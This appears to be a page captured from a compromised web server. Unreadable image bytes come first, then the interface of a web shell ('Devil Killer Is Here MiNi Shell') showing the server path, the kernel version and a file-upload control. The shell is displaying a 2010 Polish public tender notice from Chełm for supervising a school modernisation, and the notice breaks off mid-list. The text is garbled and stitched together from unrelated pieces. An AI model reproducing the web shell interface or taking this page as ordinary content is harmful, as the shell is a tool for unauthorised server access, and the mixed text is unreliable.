JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100916/253573-N-2010.html

<p class="kh_header"><b>Chełm: Nadzór Inwestorski dla zadania pn. Modernizacja budynków Zespołu Szkół Ogólnokształcących Nr 6 wraz z infrastrukturą sportowo - rekreacyjną w Chełmie,
współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013; Oś Priorytetowa VIII: Infrastruktura Społeczna. Działanie 8.2 Infrastruktura  szkolna          i sportowa</b><br>
<b>Numer ogłoszenia: 253573 - 2010; data zamieszczenia: 16.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Chełm , ul. Lubelska 63 i 65, 22-100 Chełm, woj. lubelskie, tel. 082 5652223, 5652073, faks 082 5652254.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chelm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór Inwestorski dla zadania pn. Modernizacja budynków Zespołu Szkół Ogólnokształcących Nr 6 wraz z infrastrukturą sportowo - rekreacyjną w Chełmie,
współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013; Oś Priorytetowa VIII: Infrastruktura Społeczna. Działanie 8.2 Infrastruktura  szkolna          i sportowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest nadzór inwestorski dla zadania pn. Modernizacja budynków Zespołu Szkół Ogólnokształcących Nr 6 wraz z infrastrukturą sportowo - rekreacyjną w Chełmie,współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007 - 2013; Oś Priorytetowa VIII: Infrastruktura Społeczna. Działanie 8.2 Infrastruktura  szkolna i sportowa. Zakres robót budowlanych dla których ustanowiony zostanie nadzór inwestorski w ramach projektu pn. :Modernizacja budynków Zespołu Szkół Ogólnokształcących  Nr 6 wraz z infrastrukturą sportowo - rekreacyjną w Chełmie, obejmuje następujące branże:
1)konstrukcyjno - budowlaną,
2)instalacji sanitarnych,
3)instalacji elektrycznych,
4)drogową;
zgodnie z  opracowaną dokumentacją projektową. Fragmenty dokumentacji projektowej stanowią  załącznik nr 8, charakterystyka obiektu - załącznik nr 10 do  specyfikacji istotnych warunków zamówienia. 
Wykonawca może zapoznać się z zakresem przedmiotowej inwestycji na podstawie dokumentacji projektowej i umowy o dofinansowanie Projektu zawartej w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013, które znajdują się w siedzibie Zamawiającego (Urząd Miasta Chełm Biuro Inwestycji Miejskich, ul. Lubelska 63, 22-100 Chełm, pokój nr 19). Zakres obowiązków, uprawnień i czynności wykonywanych w ramach niniejszego zamówienia obejmuje:  
1)  Powołanie zespołu inspektorów nadzoru branży: konstrukcyjno - budowlanej,       instalacji sanitarnej, instalacji elektrycznej oraz drogowej;
2)  Ustanowienie Koordynatora pracy zespołu inspektorów, odpowiedzialnego  za realizację całości zadań opisanych zamówieniem;
3)  Przyjęcie od Zamawiającego dokumentacji projektowo - kosztorysowej, kopii umowy o dofinansowanie Projektu zawartej w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013 i dokonanie, weryfikacji i analizy zebranych opracowań pod względem rozwiązań technicznych, zgodności części opisowej z częścią graficzną, zgodności przedmiarów z zakresem objętym projektem budowlanym i wykonawczym;        
4)  Przeprowadzenie szczegółowego badania sytuacji bieżącej realizowanej inwestycji, opierając się na dokumentach dostarczonych przez Zamawiającego, identyfikacja ewentualnych obszarów problemowych i rekomendacja działań zapobiegawczych;
5)  Sporządzenie raportu z weryfikacji otrzymanych materiałów w terminie 14 dni od daty podpisania umowy w sprawie niniejszego zamówienia;
6)  Opracowanie projektu procedur obiegu dokumentów gwarantujących terminową 
realizację i rozliczenie projektu zgodnie z zawartą umową o dofinansowanie i zgodnie  z wymogami RPO Województwa  Lubelskiego 2007-2013 (wdrożenie powyższych  procedur po zatwierdzeniu przez Zamawiającego);
7)  Przygotowanie materiałów do powiadomienia organu nadzoru budowlanego,         Wojewódzkiego Urzędu Ochrony Zabytków w Lublinie, Delegatura w Chełmie (jeśli zajdzie taka potrzeba), właścicieli urządzeń infrastruktury znajdującej się  w granicach inwestycji o terminie rozpoczęcia robót, z załączeniem stosownych  oświadczeń kierownika budowy i inspektorów nadzoru, potwierdzających przyjęcie  obowiązków na budowie;
8)  Protokolarne przekazanie (z udziałem Zamawiającego) Wykonawcy robót budowlanych placu budowy oraz dziennika budowy;
9)  Przygotowywanie wszelkich niezbędnych dokumentów, wystawianie i ewidencjonowanie Wniosków o płatność i protokołów odbioru zgodnie z warunkami zawartej umowy na roboty budowlane i zawartą umową o dofinansowanie  z RPO Województwa Lubelskiego 2007-2013;
10) Opracowanie i wdrożenie uzgodnionych z  Zamawiającym i Wykonawcą    szczegółowych Harmonogramów Robót, Harmonogramu Odbiorów częściowych i odbioru końcowego oraz Harmonogramu Płatności, zgodnych z umową z Województwem Lubelskim o finansowanie projektu ze środków RPO;
11) Kontrola przed i w trakcie prowadzonych robót spełnienia wymagań dotyczących  bezpieczeństwa ruchu drogowego oraz prawidłowości zorganizowania prac   budowlanych z uwzględnieniem zasad bezpieczeństwa i ochrony zdrowia;
12) Kontrola bezpiecznego sposobu składowania i przechowywania materiałów;
13) Sprawdzenie przed zastosowaniem materiałów i receptur w zakresie dopuszczenia do stosowania w budownictwie zgodnie z wymogami określonymi w obowiązujących  
normach  i rozporządzeniach;
14) Monitorowanie postępu prac poprzez porównywanie postępu faktycznego z przyjętymi harmonogramami robót, odbiorów i płatności;
15) Kontrola nad zgodnością i prawidłowością realizacji robót z dokumentacją projektową, wytycznymi technologicznymi, obowiązującymi normami, SIWZ, ofertą wykonawcy, zawartą umową na wykonanie robót budowlanych, obowiązującym prawem, w  szczególności prawem budowlanym oraz rozporządzeniami wykonawczymi do Prawa budowlanego;
16) Prowadzenie regularnych inspekcji na terenie budowy przez właściwych branżowo inspektorów w celu sprawdzenia jakości wykonywanych robót oraz wbudowywanych  materiałów, zgodnie z wymaganiami specyfikacji technicznych wykonania i odbioru 
robót budowlanych, dokumentacji projektowej oraz wiedzą techniczną; 
17) Zapewnienie codziennego nadzoru poprzez wizytowanie budowy, monitorowanie  
realizacji kontraktu, sprawdzanie obmiarów, nadzorowanie i odbiór robót, a także  zapewnienie nadzoru inwestorskiego nad realizacją inwestycji, a w szczególności  zagwarantowanie stałego nadzoru inspektorów nadzoru, w tym ich codziennej  dyspozycyjności nadzoru na placu budowy; 
18) W przypadku wystąpienia robót dodatkowych lub zamiennych, lub stwierdzając  
rozbieżności w ilości wykonanych robót budowlanych należy prowadzić książkę obmiarów robót;
19) Zapewnienie siłami i środkami własnymi Wykonawcy obecności inspektorów nadzoru w odpowiednim dla prawidłowej realizacji robót budowlanych czasie. 
20) Nadzorowanie i bieżące egzekwowanie od Wykonawcy robót budowlanych:
a)   przeprowadzania badań jakości robót i materiałów na koszt własny Wykonawcy robót budowlanych i na każde wezwanie Zamawiającego, 
b)   okazywania na każde żądanie Zamawiającego, w stosunku do wskazanych materiałów, aktualnych (tj. wystawionych w okresie obowiązywania niniejszej umowy): certyfikatu na znak bezpieczeństwa, deklaracji zgodności lub certyfikatu   
zgodności z obowiązującymi normami lub aprobatą techniczną,
c)   informowania inspektora nadzoru o terminie zakrycia robót ulegających zakryciu      
      oraz robót zanikających. 
     21) Systematyczne prowadzenie lub nadzorowanie wykonywanych badań, pomiarów,   
           prób i sprawdzeń kontrolnych, niezbędnych do zachowania wysokiej jakości robót 
           budowlanych, a w szczególności kontrola zgodności i częstotliwości ich   
           wykonywania  ze specyfikacją wykonania i odbioru robót budowlanych,  
           obowiązującymi  wytycznymi, normami i przepisami w tym zakresie.
Zamawiający nie zabezpiecza personelu, sprzętu, urządzeń lub zaplecza laboratoryjnego na potrzeby wykonywania ww. czynności.
Wyniki przeprowadzonych badań, pomiarów, prób i sprawdzeń kontrolnych będą udostępniane na każde żądanie przedstawicielowi Zamawiającego do wglądu.
22) W porozumieniu z Zamawiającym - konsultowanie i uzgadnianie z Projektantami propozycji niezbędnych zmian w dokumentacji projektowej. Sporządzanie protokołów konieczności na niezbędne roboty dodatkowe oraz udzielanie wyjaśnień w tym zakresie;
23)  Organizowanie narad technicznych, nie rzadziej niż jeden raz na tydzień,                        oraz sporządzania protokółów z tych narad i przekazywania ich Zamawiającemu i Wykonawcom robót budowlanych w terminie 3 dni od dnia narady. 
W przypadku zaistnienia konieczności organizowania narad technicznych częściej niż jeden raz na tydzień - narady będą organizowane w terminach wyznaczonych przez Inspektora Nadzoru Inwestorskiego;
24) Przygotowywanie dla Zamawiającego okresowych - miesięcznych raportów z realizacji projektu zawierających m.in. informacje dotyczące postępu robót, ilości, zakresu i terminów realizowanych robót, oceny w stosunku do zatwierdzonego harmonogramu rzeczowo -finansowego, identyfikację zagrożeń i program działań naprawczych oraz informacje dot. działalności nadzoru inwestorskiego;
25)  Przygotowanie materiałów i udział w spotkaniach organizowanych                       przez Zamawiającego z przedstawicielami mediów;
26)  Organizacja i dokonywanie odbiorów robót zanikających, częściowych i odbiorów końcowych oraz przyjmowanie od Wykonawców robót budowlanych wszelkich dokumentów wymaganych w terminie odbioru (w tym atesty, aprobaty techniczne, protokoły badań, protokoły pomiarów, gwarancje i instrukcje obsługi zainstalowanych urządzeń i systemów, inwentaryzacje powykonawcze instalacji, obiektów i części obiektów);
27)  Rozliczenie umowy o roboty budowlane w przypadku jej rozwiązania;
28)  Zgłoszenie Zamawiającemu gotowości do odbiorów częściowych i końcowego robót oraz sprawdzenie kompletności i prawidłowości przedłożonych przez Wykonawców robót budowlanych dokumentów wymaganych do odbioru;
29)  Gromadzenie wszelkiej dokumentacji niezbędnej do sporządzania rozliczeń okresowych i rozliczenia końcowego projektu zgodnie z przyjętym w umowie z Województwem Lubelskim o finansowanie projektu oraz harmonogramem i wymogami RPO;
30)  Przygotowywanie wszelkich niezbędnych danych wartościowych, ilościowych                       i ich kompletowanie w postaci dokumentów niezbędnych dla końcowego rozliczenia projektu;
31)  Przedkładanie powyższych informacji i dokumentów Zamawiającemu sporządzającemu rozliczenia finansowe okresowe i końcowe projektu, zgodnie z umową dofinansowania i obowiązującymi zasadami rozliczania inwestycji finansowanych ze środków RPO;
32)  Sporządzanie protokołów wykonanych i odebranych robót częściowych i odbioru końcowego. W przypadku stwierdzenia wad podczas odbioru Inspektor Nadzoru Inwestorskiego będzie renegocjował kwoty i terminy zapłaty oraz sporządzał wykaz wad i określał terminy ich usunięcia;
33)  Potwierdzanie zgodności faktur/rachunków wystawianych przez dostawców i wykonawców robót budowlanych i dostawców z protokołami odbiorów częściowych i końcowego. Załącznikiem do każdej faktury są protokoły odbioru wykonania robót;
34) Odbiór od wykonawców robót budowlanych całej dokumentacji budowy i dokumentacji powykonawczej, a także wszelkich dokumentów i oświadczeń koniecznych do uzyskania pozwolenia na użytkowanie i właściwą eksploatację obiektów, kompletowanie ich i przedkładanie Zamawiającemu;
35) Wystąpienie w imieniu Zamawiającego do organu nadzoru budowlanego o wydanie decyzji - pozwolenia na użytkowanie (jeżeli taki wymóg zaistnieje);
     36) W okresie gwarancji i rękojmi (3 lata licząc od odbioru końcowego robót   
            budowlanych) do Wykonawcy należy:
a)raz w roku, dokonanie wraz z  wykonawcą robót budowlanych i Zamawiającym przeglądu technicznego zakończonych inwestycji. Po wykryciu wad Inspektor Nadzoru Inwestorskiego będzie nadzorował ich usunięcie przez wykonawcę robót budowlanych oraz dokona odbioru po ich usunięciu;
b)reprezentowanie Zamawiającego w negocjacjach, postępowaniach mediacyjnych        lub arbitrażowych dotyczących nierozstrzygniętych roszczeń i sporów,
c)sprawdzenie i potwierdzenie gotowości obiektu do dokonania przez Zamawiającego komisyjnego odbioru pogwarancyjnego wraz z przygotowaniem wszelkich niezbędnych dokumentów,
d)wnioskowanie po wystawieniu Świadectw Wykonania o zwrot części Zabezpieczenia należytego wykonania robót budowlanych;
37)  Opisywanie faktur, rachunków i innych dokumentów wystawianych Zamawiającemu, tak by zachować całkowitą zgodność z wymogami RPO Województwa Lubelskiego 2007-2013, Instytucji Zarządzającej oraz z innymi obowiązującymi w tym zakresie przepisami prawa;
38)  Współpraca z Zamawiającym w celu prawidłowego całkowitego, końcowego rozliczenia rzeczowego i finansowego projektu zgodnie z umową dofinansowania i obowiązującymi zasadami rozliczania inwestycji finansowanymi ze środków RPO;
39) Sporządzanie i przedstawienie Zamawiającemu wniosków o naliczenie kar umownych w przypadku wystąpienia okoliczności określonych w umowach              na wykonanie robót budowlanych i dostawy oraz przewidzianych w Kodeksie cywilnym;
40)  Dostarczanie Zamawiającemu dokumentów i informacji w terminach przez niego ustalonych w przypadku sporów sądowych i innych wynikających z realizacji inwestycji;
41)  Rozliczenie wykonawcy robót budowlanych pod względem rzeczowym i finansowym;
42)  Przygotowanie w porozumieniu z Zamawiającym raportu końcowego dla Instytucji Zarządzającej RPO do Lubelskiego Urzędu Marszałkowskiego;
43)  Udział w przeprowadzanych kontrolach dotyczących realizacji projektu;
44)  Podejmowanie decyzji o: 
a) dopuszczeniu materiałów, prefabrykatów i wszystkich elementów i urządzeń przewidzianych do wbudowania i wykorzystania przy realizacji robót,
b) zatwierdzeniu receptur i technologii proponowanych przez Wykonawcę robót budowlanych,
c) sprzęcie i środkach transportu Wykonawcy robót budowlanych,
d) wstrzymaniu robót prowadzonych w sposób zagrażający bezpieczeństwu           
           lub niezgodnie z wymaganiami umowy na roboty budowlane;
 45) Wnioskowanie o: 
 a)  wprowadzenie niezbędnych zmian w dokumentacji projektowej, 
 b)  przeprowadzenie niezbędnych badań i pomiarów lub ekspertyz przez  
      niezależnego Inspektora,
 c)  zlecenie usunięcia wad stronie trzeciej w przypadku gdy wykonawcy robót       
      budowlanych nie usuną ich w wyznaczonym terminie na koszt Wykonawcy   
      robót budowlanych,
 d)  konieczność zmiany terminu wykonania robót budowlanych, kiedy zmiana taka nie  
      wynika z winy czy zaniedbań wykonawcy robót budowlanych, 
 e)  uzgodnienie zakresu robót dodatkowych, jeżeli wystąpi uzasadniona potrzeba  
      ich wykonania oraz zawiadomienie o tym Zamawiającego w celu zlecenia ich   
      wykonania.
46) Monitorowanie i kontrolowanie: 
 a) przyjętego Harmonogramu robót budowlanych,
 b) przyjętego Harmonogramu odbiorów częściowych,
 c) przyjętego Harmonogramu płatności.
           W przypadku zagrożenia dotrzymania terminu realizacji robót zgodnie                    
z harmonogramem Inspektor Nadzoru Inwestorskiego zobowiązany jest   
           natychmiast powiadomić Zamawiającego;
47) Wykonywanie wszystkich innych czynności, które będą konieczne do prawidłowej 
                  realizacji umów na roboty budowlane (wg obowiązujących przepisów prawa, w tym  
                  Prawa   Zamówień  Publicznych, Prawa Budowlanego, Prawa Cywilnego, procedur  
                  RPO Województwa Lubelskiego 2007  - 2013 oraz Instytucji Pośredniczących);
Wykonawca będzie ponosił odpowiedzialność za wszelkie opóźnienia, nieprawidłowości        lub wady, do których przyczynił się w szczególności poprzez brak zapewnienia nadzoru wymaganego przepisami prawa lub niniejszą umową.
Zamawiający nie zapewnia środków transportu i stałych pomieszczeń biurowych dla potrzeb niniejszego zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.24.80.00-8, 71.54.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 3 400,00 PLN  (słownie:trzy tysiące czterysta PLN ) w terminie i na zasadach określonych w specyfikacji istotnych warunków zamówienia</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu będzie dokonana według formuły spełnia/nie spełnia wymagany warunek na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ). Wykonawcy wspólnie ubiegający się o udzielenie zamówienia spełnią ten warunek jeżeli zostanie on spełniony łącznie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący posiadania wiedzy i doświadczenia, w szczególności w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  wykonali lub wykonują   co najmniej dwie usługi, każda  polegająca na pełnieniu funkcji inspektora nadzoru lub kierownika projektu (kontraktu) przy inwestycjach budowlanych obejmujących roboty: konstrukcyjno-budowlane, instalacji sanitarnych, instalacji elektrycznych, drogowe każda o wartości nie mniejszej niż 50 000 zł lub co najmniej jedną usługę polegającą na pełnieniu funkcji inspektora nadzoru lub kierownika projektu (kontraktu) przy inwestycjach budowlanych obejmujących roboty: konstrukcyjno-budowlane, instalacji sanitarnych, instalacji elektrycznych, drogowe o wartości nie mniejszej niż 100 000 zł. Ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu  będzie dokonana według formuły spełnia/nie spełnia wymagany warunek na podstawie:
a- oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ). 
b - wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (załącznik nr 4 do SIWZ).
Przedłożony wykaz powinien zawierać co najmniej dwie usługi, każda  polegająca na pełnieniu funkcji inspektora nadzoru lub kierownika projektu (kontraktu)  przy inwestycjach budowlanych obejmujących roboty: konstrukcyjno-budowlane, instalacji sanitarnych, instalacji elektrycznych, drogowe każda o wartości nie mniejszej niż 50 000 zł lub co najmniej jedną usługę polegającą na pełnieniu funkcji inspektora nadzoru lub kierownika projektu (kontraktu)  przy inwestycjach budowlanych obejmujących roboty: konstrukcyjno-budowlane, instalacji sanitarnych, instalacji elektrycznych, drogowe o wartości nie mniejszej niż 100 000 zł.   
Do każdej usługi umieszczonej w wykazie należy dołączyć dokumenty potwierdzające, że usługi zostały wykonane lub są wykonywane należycie (np. referencje, protokoły odbioru lub inne posiadane przez Wykonawcę dokumenty).
Zamawiający przy ocenie spełniania tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia weźmie pod uwagę łączne doświadczenie Wykonawców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący dysponowania odpowiednim potencjałem technicznym. Ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu  będzie dokonana według formuły spełnia/nie spełnia wymagany warunek na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ). 
Zamawiający przy ocenie spełniania tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia weźmie pod uwagę łączny potencjał techniczny Wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia, w szczególności dysponują:
a - co najmniej 1 osobę   - będącą Koordynatorem zespołu inspektorów, 
b - co najmniej 1 osobę - będącą inspektorem nadzoru robót konstrukcyjno -   
     budowlanych, posiadającą co najmniej 3-letnią praktykę oraz niezbędne  
     uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez   
     ograniczeń, które uprawniają  do kierowania robotami budowlanymi,
c - co najmniej 1 osobą - będącą inspektorem nadzoru robót sanitarnych   
     posiadającą co najmniej 3-letnią praktykę oraz niezbędne uprawnienia  
     budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń  
     cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych         
     bez ograniczeń, które uprawniają do kierowania robotami budowlanymi,
d - co najmniej 1 osobą - będącą inspektorem nadzoru robót elektrycznych posiadającą co najmniej 3-letnią praktykę oraz niezbędne uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, które uprawniają          do kierowania robotami budowlanymi, 
e - co najmniej 1 osobą - będącą inspektorem nadzoru robót drogowych, posiadającą co najmniej 3-letnią praktykę oraz niezbędne uprawnienia budowlane w specjalności drogowej bez ograniczeń, które uprawniają             do kierowania robotami budowlanymi.
Zamawiający określając wymogi w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające uprawnienia wydane osobie będącej obywatelem państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12 a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz.U. z 2006 r. Nr 156, poz. 1118 z późn. zm.) oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r. Nr 63, poz. 394).
Ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu  będzie dokonana według formuły spełnia/nie spełnia wymagany warunek na podstawie:
a -oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ)
